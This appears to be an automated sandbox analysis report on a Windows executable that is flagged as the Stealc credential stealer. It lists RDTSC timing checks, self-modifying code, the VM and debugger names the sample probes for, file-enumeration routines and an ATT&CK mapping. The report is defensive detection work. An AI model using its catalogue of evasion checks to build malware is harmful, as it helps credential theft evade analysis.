                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972298 second address: 9722AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F5E9917DE26h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975915 second address: 97591A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DB2D second address: 97DB3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E9917DE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DB3F second address: 97DB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DB43 second address: 97DB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985819 second address: 98584A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4122h 0x00000009 popad 0x0000000a jmp 00007F5E987E4126h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98584A second address: 98584E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98584E second address: 98585A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98585A second address: 98585E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983BC4 second address: 983BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4125h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995B0C second address: 995B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995B14 second address: 995B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5E987E4122h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jne 00007F5E987E4116h 0x00000019 jg 00007F5E987E4116h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995CA4 second address: 995CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4A73 second address: 9A4A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jc 00007F5E987E411Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 jnc 00007F5E987E4116h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4A8C second address: 9A4A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5E9917DE26h 0x0000000a jo 00007F5E9917DE26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4BFF second address: 9A4C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jng 00007F5E987E411Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4D8A second address: 9A4D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4D8E second address: 9A4DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E987E4123h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4DAB second address: 9A4DB5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A535A second address: 9A536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E987E411Bh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A536E second address: 9A5372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A54E8 second address: 9A54EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A54EC second address: 9A54F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5634 second address: 9A567F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F5E987E4116h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5E987E4121h 0x00000012 popad 0x00000013 jo 00007F5E987E4133h 0x00000019 jmp 00007F5E987E4127h 0x0000001e jg 00007F5E987E4116h 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 push edx 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A567F second address: 9A5688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5688 second address: 9A5698 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E987E4116h 0x00000008 jnc 00007F5E987E4116h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5698 second address: 9A569F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A569F second address: 9A56A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5947 second address: 9A594B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A594B second address: 9A5953 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5953 second address: 9A5959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5959 second address: 9A595F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A595F second address: 9A5963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9C7F second address: 9A9C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA00B second address: 9AA095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F5E9917DE38h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push edx 0x00000015 jmp 00007F5E9917DE2Ah 0x0000001a pop edx 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F5E9917DE37h 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jnp 00007F5E9917DE3Eh 0x0000002d jmp 00007F5E9917DE38h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F5E9917DE35h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA2A4 second address: 9AA300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 ja 00007F5E987E412Bh 0x0000000f jmp 00007F5E987E4125h 0x00000014 push dword ptr [ebp+122D335Eh] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F5E987E4118h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1860h], esi 0x0000003a push A63C4FE6h 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA76 second address: 9ADA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5E9917DE26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA82 second address: 9ADA9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5E987E411Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A2 second address: 51902A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A6 second address: 51902AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902AC second address: 51902B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902B2 second address: 51902B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902B6 second address: 51902E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c mov cx, bx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F5E9917DE33h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, C2h 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902E4 second address: 51902EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190346 second address: 519036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519036C second address: 5190371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190371 second address: 51903B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 pushfd 0x00000011 jmp 00007F5E9917DE34h 0x00000016 xor al, FFFFFF98h 0x00000019 jmp 00007F5E9917DE2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903B6 second address: 51903CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E4124h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903CE second address: 51903FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5E9917DE36h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903FE second address: 5190404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 711954 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E86A2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 949935 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B1160 GetSystemInfo,ExitProcess,0_2_004B1160
                Source: file.exe, file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1413525563.00000000011B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1413525563.00000000011E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13655
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13667
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13675
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13707
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B45C0 VirtualProtect ?,00000004,00000100,000000000_2_004B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004C9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9750 mov eax, dword ptr fs:[00000030h]0_2_004C9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004C7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004C9600
                Source: file.exe, file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: pProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_004C7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_004C6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004C7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_004C7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

